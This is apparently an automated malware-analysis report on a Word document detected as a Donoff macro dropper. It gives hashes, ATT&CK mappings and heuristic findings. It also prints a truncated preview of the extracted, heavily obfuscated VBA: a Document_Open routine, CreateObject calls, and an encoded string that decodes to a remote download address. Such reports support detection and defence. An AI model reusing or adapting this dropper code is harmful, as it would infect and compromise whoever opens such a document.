Donoff — Office (OLE) malware analysis

Static analysis result for SHA-256 ce78e8bfcc2fa4ef…

MALICIOUS

Office (OLE)

103.5 KB Created: 2016-05-31 21:34:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 0771d88eb328af0c28bff73620c4f6ce SHA-1: a592c874ab2f6f109bd9619c7d64bb3d39c6c148 SHA-256: ce78e8bfcc2fa4ef04c9b83815b72e1b4153b7bbfc4264d4d85981422245dba1
242 Risk Score

Malware Insights

Donoff · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and CallByName functions. This strongly suggests the execution of malicious code upon opening the document. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' further supports this, indicating a dropper functionality likely intended to download and execute a secondary payload. The VBA code itself is heavily obfuscated, making specific payload analysis difficult, but the overall pattern points to a Donoff family dropper.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19104 bytes
SHA-256: cb1ddb73da06febebf0a5877dc51319a3a1033d60bc7b44025ecafdd01d9de6e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub WyyWULWYSi(ByVal OBEdkizvIqANSj As String, ByVal iTcptNtitkX As Integer)
JBGCrVx True, "61wH1rFeSckSe4WmjgC", 9044
eklaYYxB "BqJ9zUcRjgcgRXBEcoKmoRJv88HLj", "EFyjiZ4NyH7nAqOXr"
XRTLmWclX
LFMitxQT = 6741
If tlwOUP("7uSQTjm0DKEmrUbeqOAlOqe3SA2XSf", 886, 440) Then
FVoXCU = 9024
Jfqiww
DeMBErMM 1883
qfmfnUhU = 3192
ogQaKhB "E7H3kjiKQlrB4uz4hY"
yxvDZxGOono = "4V9Prmqq5pp2T3boDTt53SgVtZp6FwX"
Else
VPqSaCwywvi 653, 5024, 4694
iVcFllAOL "XSzIiqG023tL0tBudBlk88rPScG3D", 9258
dLXNRHI
UDjzxhB = False
End If
End Sub
Private Sub gfKVhnpWu(ByVal XjlJlQPCcmrv As Integer)
zLRlicMtXXKlV "rOrKUsrEkpwsCCW33P41pQu8ZoooG", "0WaQ7ihJDYiixj5e3T6XklW4P7TxHqn", "WBbZEwbE7I4LWwSJRi7zx0Nln"
vHqrgNeYdpuy = 358
HTcopEWFEd
RdzhvqvlE = "xLVtiCYc7iFsaEsELLyxuwRS2Di"
If TZLddMcA(True, 55, True) Then
alkeJPfCbUMBdm = 4069
MeckKl 555, "z8MCplodnJF9rbC7h8GUk", 2131
dQGWuKA = "pDgH1VBPv1VycHgrWtVCcIFdtPlSYW"
wsMERaKf
Else
LscCUh
sDTkJvthsychG 9355
IAQqnKpk = "Hfn8wNq6VVqVQpYvlNlGkhUODToBp"
End If
End Sub
Private Sub Document_Open()
Dim plTZdPka As Integer
Dim ncigYiQhft As Boolean
jEvmGvhtVJWZ.kTCWjU
End Sub

Attribute VB_Name = "jEvmGvhtVJWZ"
Private Sub SPmuRuORMlor(ByVal HgIZusrEmlYCXQ As String, ByVal EBQLGMY As String)
FgpUGo "EGD1Z1OQJ8AZSdcOhhc"
xAfBi = "fB9G2pgh9CloiivBucrFwQojd2Wa"
qllxLM "dQgTZOvp02GroYMHMWLo62TWcsxzRY", "8ojFpr5Fio5WOJgO1pNLTO", True
End Sub
Private Sub SPIypoc(ByVal PpSewz As Integer, ByVal qdFDWQxu As String)
uAPgblLe 3110
jPjtiINzaY = 6371
CNDhphipo "A78Ku2RnJsbgaamys", "G6AkAjTKsKWIwp48BaH0ctXRvlKgDH"
IhvwV = True
LBgHikUSTuk
End Sub
Private Sub bVdQWOlL(ByVal ozcccogqQJ As String, ByVal QOBsDKJS As Boolean)
bqrshfOOnObQar
sJhKGp
AXJwRmSPOAkc
End Sub
Public Function mshXOCr(ByVal pEarGnj As String, ByVal TUvONr As String) As Object
Dim jRxEbKDa As Integer
Dim XCZIIIHPUk As String
Set mshXOCr = QFzYcmJViwYIP(CreateObject(pEarGnj))
End Function
Public Sub kTCWjU()
Dim VYJDCDbnTrw As String
Dim mPVZLmKXRSHyBt As Integer
On Error GoTo slDgQgrOOSTgn
ttVXuQ.YIuXEJoscsaj
ttVXuQ.MIYUXhxY
lMdfkjFy
Exit Sub
slDgQgrOOSTgn:
End Sub
Private Sub nsYPZNJ(ByVal fdgeL As String)
iUzhs = "KmYsR7JIDoubdQl14wrvbBok"
If AHuyFwATrHBOv Then
KPWbwiTHxKEiL False, "T5LdCaD3BwhlO844SJbShL2kXiAvn8"
fsfyAnHlp
LhbSRruW True
Else
CJAzEj 2123
End If
jFyGoZAutdqkGd "qhW0gCWZu7fR2FUiyWYD0lpxokEuO1", 972
End Sub
Private Function QFzYcmJViwYIP(ByVal wBCzXKPHCoZf As Object) As Object
Dim qvVvJqxo As Integer
Set QFzYcmJViwYIP = wBCzXKPHCoZf
End Function
Private Sub QvXwf(ByVal HnOErTetEaKlM As String, ByVal ZTutrQVKg As String, ByVal vravubiPvDRh As String)
Set vzvwrEQSoD = YovrSSgvMPJO.QceWTMEJaYLCQj(True, vravubiPvDRh)
YovrSSgvMPJO.MMhiDsZmghwW CfMkynEbhSr, 2670, "arguyw2nGgGkc6QAe5NL", vzvwrEQSoD
IGprEAKJAuxR.pugilrQ IyVrcDHGq.TaoElp(HBgZTg, vzvwrEQSoD, 8879), False, "cejo7MPw6YS1LmNofeBzpX", HnOErTetEaKlM
End Sub
Private Sub lMdfkjFy()
Dim VLjTCnVrJU As Boolean
QvXwf IGprEAKJAuxR.SxhCKi, "jh1u3B528NFiUmAXx8lNtG5R0EI", BnLAMbzZZAofvM
IGprEAKJAuxR.ukYSHemkFaQeJd False, 618, IGprEAKJAuxR.SxhCKi
End Sub
Private Function CfMkynEbhSr() As String
CfMkynEbhSr = BOKWxMMrFkr.iKBNbg("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function HBgZTg() As String
HBgZTg = BOKWxMMrFkr.iKBNbg("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function BnLAMbzZZAofvM() As String
BnLAMbzZZAofvM = BOKWxMMrFkr.iKBNbg("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "BOKWxMMrFkr"
Private Function eVoEHMFWcUs(ByVal LVWIVzceQWVK As Integer, ByVal yVbFEr As Integer, ByVal agcsvDDW As String, ByVal MYcew As String) As String
If Not FxqHauXhrNAYyw.YcJR
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.